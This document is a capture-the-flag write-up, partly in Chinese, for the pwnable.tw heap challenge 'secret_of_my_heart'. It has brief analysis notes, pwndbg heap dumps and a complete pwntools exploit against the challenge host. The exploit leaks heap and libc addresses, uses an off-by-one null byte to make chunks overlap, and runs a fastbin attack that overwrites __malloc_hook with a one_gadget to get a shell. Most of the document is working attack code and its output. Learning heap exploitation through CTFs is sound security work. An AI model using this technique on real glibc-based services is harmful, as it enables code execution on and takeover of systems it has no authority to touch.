
secret_of_my_heart

分析

Arch:     amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled

libc 为 Ubuntu 16.04 自带的 glibc 2.23（没有 tcache）。下面的 unsorted bin 泄露算式（main_arena+88）和 __malloc_hook-0x23 处的 fastbin fake chunk 都依赖这一版本的布局，换 libc 需要重新核对偏移。

  1. name 处泄露堆地址 → libc 地址：name 固定 0x20 字节且不以 \0 截断，show 时会把紧随其后的 8 字节 secret 指针一并打印出来，得到堆地址；之后再借助重叠堆块读出 unsorted bin 中 chunk 的 fd（指向 main_arena+88），换算出 libc 基址。
  2. 利用 off-by-one（poison null byte）把相邻 chunk 的 size 低字节清零，配合提前布置好的 fake prev_size 构造重叠堆块，让同一段内存同时被两个 index 引用。
pwndbg> x/50gx 0x55772c5e7000
0x55772c5e7000: 0x0000000000000000 0x0000000000000031 # 0
0x55772c5e7010: 0x6262626262626262 0x6262626262626262
0x55772c5e7020: 0x6262626262626262 0x6262626262626262
0x55772c5e7030: 0x6262626262626262 0x0000000000020fd1
0x55772c5e7040: 0x000055772c5e7110 0x00007fdaa1abeb78
0x55772c5e7050: 0x6363636363636363 0x6363636363636363
0x55772c5e7060: 0x6363636363636363 0x6363636363636363
0x55772c5e7070: 0x6363636363636363 0x6363636363636363
0x55772c5e7080: 0x6363636363636363 0x6363636363636363
0x55772c5e7090: 0x6363636363636363 0x6363636363636363
0x55772c5e70a0: 0x6363636363636363 0x6363636363636363
0x55772c5e70b0: 0x6363636363636363 0x6363636363636363
0x55772c5e70c0: 0x0000000000000090 0x0000000000000050 # 可被修改块 3
0x55772c5e70d0: 0x6363636363636363 0x6363636363636363
0x55772c5e70e0: 0x6363636363636363 0x6363636363636363
0x55772c5e70f0: 0x6363636363636363 0x6363636363636363
0x55772c5e7100: 0x6363636363636363 0x6363636363636363
0x55772c5e7110: 0x6161616161616100 0x0000000000000021
0x55772c5e7120: 0x00007fdaa1abeb78 0x00007fdaa1abeb78
0x55772c5e7130: 0x0000000000000020 0x0000000000000000
0x55772c5e7140: 0x0000000000000110 0x0000000000000110
0x55772c5e7150: 0x6161616161616161 0x6161616161616161
0x55772c5e7160: 0x6161616161616161 0x6161616161616161
0x55772c5e7170: 0x0000000000000000 0x0000000000000000
0x55772c5e7180: 0x0000000000000000 0x0000000000000000
pwndbg> x/50gx 0x55ff8cab6000
0x55ff8cab6000: 0x0000000000000000 0x0000000000000031
0x55ff8cab6010: 0x0000000000000000 0x0000000000000000
0x55ff8cab6020: 0x0000000000000000 0x0000000000000000
0x55ff8cab6030: 0x0068732f6e69622f 0x0000000000000091 # 再次申请0x80大小到这块,1
0x55ff8cab6040: 0x000055ff8cab0064 0x00007f220ed26b78
0x55ff8cab6050: 0x6363636363636363 0x6363636363636363
0x55ff8cab6060: 0x6363636363636363 0x6363636363636363
0x55ff8cab6070: 0x6363636363636363 0x6363636363636363
0x55ff8cab6080: 0x6363636363636363 0x6363636363636363
0x55ff8cab6090: 0x6363636363636363 0x6363636363636363
0x55ff8cab60a0: 0x6363636363636363 0x6363636363636363
0x55ff8cab60b0: 0x6363636363636363 0x6363636363636363
0x55ff8cab60c0: 0x0000000000000090 0x0000000000000111 # 2, 3
0x55ff8cab60d0: 0x6464646464646464 0x6464646464646464
0x55ff8cab60e0: 0x6464646464646464 0x6464646464646464
0x55ff8cab60f0: 0x6464646464646464 0x6464646464646464
0x55ff8cab6100: 0x6464646464646464 0x6464646464646464
0x55ff8cab6110: 0x6464646464646464 0x6464646464646464
0x55ff8cab6120: 0x6464646464646464 0x6464646464646464
0x55ff8cab6130: 0x6464646464646464 0x0000000000000070 # fake size
0x55ff8cab6140: 0x0000000000000100 0x0000000000000110
0x55ff8cab6150: 0x6161616161616161 0x6161616161616161
0x55ff8cab6160: 0x6161616161616161 0x6161616161616161
0x55ff8cab6170: 0x0000000000000000 0x0000000000000000
0x55ff8cab6180: 0x0000000000000000 0x0000000000000000

再 free(2)：这个 0x110 大小的 chunk 进入 unsorted bin，fd/bk 指向 main_arena+88；由于 index 3 与 2 重叠，show(3) 即可读出该指针，减去 88、0x10 以及 __malloc_hook 在 libc 中的偏移就得到 libc 基址。

  1. 改 __malloc_hook 而不是 __free_hook：__free_hook 周围全是 0x00，找不到能当 fastbin fake size 的字节；而 __malloc_hook-0x23 处（通常是 0x7f）可以伪造一个 0x70 大小的 fake chunk，用 fastbin attack 把它分配出来后即可覆盖 hook。最终 exp 写入的是 one_gadget（写 system 的版本被注释掉了，因为 malloc 的第一个参数是 size，无法直接控制 rdi），再让程序调用一次 malloc 即可拿到 shell；若所选 one_gadget 的寄存器/栈约束不满足，换列表里的另一个偏移。

exp

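#!/usr/bin/env python2
# NOTE: Python 2 only -- the script sends str payloads and calls .next() on
# libc.search(...), both of which Python 3 rejects.  (The original shebang
# "#!usr/bin/python" was a relative path and could never be exec'd.)
from pwn import *

# Log every byte sent/received; useful while tuning the heap layout, noisy
# once the chain works.
context.log_level = 'debug'

binary = "./secret_of_my_heart"   # local copy of the challenge binary
ip = "chall.pwnable.tw"           # remote challenge host
port = 10302
elf = ELF(binary)                 # parsed at import time: the file must exist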

def add(size, sec):
    """Menu option 1: create an entry of `size` bytes holding `sec`.

    The name is always 0x20 'k's so show() output can be scanned for it;
    `sec` is sent raw (no trailing newline) and may be shorter than `size`.
    Uses the module-level `io` tube set up by pwn().
    """
    menu_choice = "1"
    io.sendlineafter("Your choice :", menu_choice)
    io.sendlineafter(" : ", str(size))
    name = "k" * 0x20
    io.sendafter(" :", name)
    io.sendafter(" :", sec)

def show(idx):
    """Menu option 2: print entry `idx` (name and secret).

    Uses the module-level `io` tube set up by pwn(); the caller reads the
    output it needs (e.g. the leaked pointers) from `io` afterwards.
    """
    for prompt, answer in (("Your choice :", "2"), ("Index :", str(idx))):
        io.sendlineafter(prompt, answer)

def delete(idx):
    """Menu option 3: free entry `idx`.

    Uses the module-level `io` tube set up by pwn().  Whether the program
    clears the slot after free() is not visible here; the exploit frees some
    indices more than once, so do not assume it does.
    """
    index = str(idx)
    io.sendlineafter("Your choice :", "3")
    io.sendlineafter("Index :", index)

def pwn(ip, port, debug):
    """Run the whole exploit chain against a local process or the remote service.

    Args:
        ip, port: remote target, used only when debug != 1.
        debug: 1 -> spawn `binary` locally and use the host libc (elf.libc);
               anything else -> connect to ip:port and use ./libc_64.so.6.

    Side effects: binds the module-level `io` tube that add/show/delete use
    and ends in io.interactive().  Every offset below (the main_arena+88 leak
    arithmetic, the fastbin fake chunk at __malloc_hook-0x23, the one_gadget
    lists) is tied to the Ubuntu 16.04 / glibc 2.23 libc of this challenge.
    """
    global io
    if debug == 1:
        io = process(binary)
        libc = elf.libc
        # one_gadget offsets for the local host libc; index 2 is used below.
        one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
        # libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    else:
        io = remote(ip, port)
        libc = ELF("libc_64.so.6")
        # one_gadget offsets for the remote libc_64.so.6; index 2 is used below.
        one = [0x45216, 0x4526a, 0xef6c4, 0xf0567]

    # ---- Stage 1: heap leak through the un-terminated name field -----------
    # add() always sends a 0x20-byte name of 'k's.  show() prints it without a
    # NUL terminator, so the 8-byte secret pointer stored right after the name
    # (record layout: name at +8, secret pointer at +0x28) comes out as well.
    add(0x20, "a" * 0x20) # 0
    show(0)
    io.recvuntil("k"*0x20)
    # Only 6 bytes of a user-space pointer are non-zero; -0x10 converts the
    # data pointer into its chunk address.  `heap` is only logged afterwards.
    heap = u64(io.recv(6).ljust(8, '\x00')) - 0x10
    success("heap = "+hex(heap))

    # ---- Stage 2: off-by-one -> overlapping chunks --------------------------
    # Chunk 1 gets a fake prev_size of 0x100 at offset 0xF0 of its data; this is
    # the value the allocator will read once chunk 1 has been shrunk by the
    # null byte (poison-null-byte technique).
    add(0x100, "a" * 0xF0+p64(0x100)) # 1
    add(0x100, "a" * 0x20) # 2
    delete(1)
    delete(0)
    # Re-take slot 0 (a 0x30 chunk, see the pwndbg dump) with a 0x28-byte
    # request.  Presumably the program writes a terminating NUL at buf[size],
    # i.e. onto the low byte of the next chunk's size field -- that is the
    # off-by-one this stage relies on.  "/bin/sh\0" is parked at the end of the
    # buffer for the (unused) system() variant.
    payload = "/bin/sh\x00"
    payload = payload.rjust(0x28, "\x00")
    add(0x28, payload) # 0
    # delete(2)
    # Carve the shrunken free region so that a later 0x110 chunk and a
    # fastbin-sized chunk share memory (indices 2 and 3 end up aliasing).
    add(0x80, "c" * 0x80)
    add(0x40, "c" * 0x40) # ...

    delete(1)
    delete(2)

    add(0x80, "d") # 1
    # p64(0x70) at offset 0x68 plants a fake size ("fake size" in the dump);
    # it later serves as the valid-looking next-chunk size when the 0x70
    # chunk carved out of this region is freed into the fastbin.
    add(0x100, "d"*0x68 + p64(0x70)) # 2/3
    add(0x80, "d") # 4

    # ---- Stage 3: libc leak through the overlap -----------------------------
    # Freeing 2 (a 0x110 chunk) puts it in the unsorted bin with fd/bk ->
    # main_arena+88; index 3 still points into it, so show(3) prints that fd.
    delete(2)
    show(3)
    io.recvuntil("Secret : ")
    # glibc 2.23 x86-64: main_arena+88 == __malloc_hook + 0x10 + 88, hence the
    # subtraction; the hard-coded alternative for this libc is -0x3C4B78.
    libc_base = u64(io.recv(6).ljust(8, '\x00'))-88-0x10-libc.symbols['__malloc_hook']# -0x3C4B78
    success("libc_base = "+hex(libc_base))

    malloc_addr = libc_base + libc.sym['__malloc_hook']
    sys_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + libc.search("/bin/sh\x00").next()
    # Rebinds `one` from the offset list to the absolute address of gadget #2.
    # one_gadgets have register/stack constraints; if no shell appears, try
    # another index.
    one = libc_base + one[2]
    success("malloc_addr = "+hex(malloc_addr))
    success("sys_addr = "+hex(sys_addr))
    success("binsh_addr = "+hex(binsh_addr))

    # ---- Stage 4: fastbin attack on __malloc_hook ---------------------------
    # Re-allocate the region containing chunk 3's header and set its size to
    # 0x71, turning index 3 into a 0x70 fastbin-sized chunk.
    delete(1)
    add(0x100, "e"*0x80+p64(0)+p64(0x71))

    delete(3)
    delete(1)

    # Same write again, now also overwriting the freed chunk 3's fd with
    # __malloc_hook-0x23: the 0x7f byte found there passes the fastbin size
    # check for the 0x70 bin.
    add(0x100, "f"*0x80+p64(0)+p64(0x71)+p64(malloc_addr-0x23))
    add(0x60, "f")
    # The second 0x60 request returns the fake chunk; 0x13 bytes of padding
    # put `one` exactly at __malloc_hook (0x23 - 0x10 header = 0x13).
    # add(0x60, "\x00"*0x13+p64(sys_addr))
    add(0x60, "\x00"*0x13+p64(one))
    '''
    io.sendlineafter("Your choice :", str(1))
    io.sendlineafter(" : ", str(0x30))
    io.sendafter(" :", "k"*0x20)
    '''
    # Trigger: the hook fires on the next malloc.  The author relies on
    # delete(3) (plus whatever is typed in interactive mode); the commented-out
    # add above is the plain alternative if this free does not reach malloc.
    delete(3)
    io.interactive()

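if __name__ == '__main__':
    # Default (no arguments): attack the remote service, as before.
    # Pass "local" or "1" as the first argument to run against a local
    # ./secret_of_my_heart with the host libc instead.
    import sys
    local = len(sys.argv) > 1 and sys.argv[1] in ("local", "1")
    pwn(ip, port, 1 if local else 0)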


'''
unk_202018 + 48LL * i : secret_size
unk_202018 + 48LL * i + 8 : name
unk_202018 + 48LL * i + 0x28 : secret_addr

'''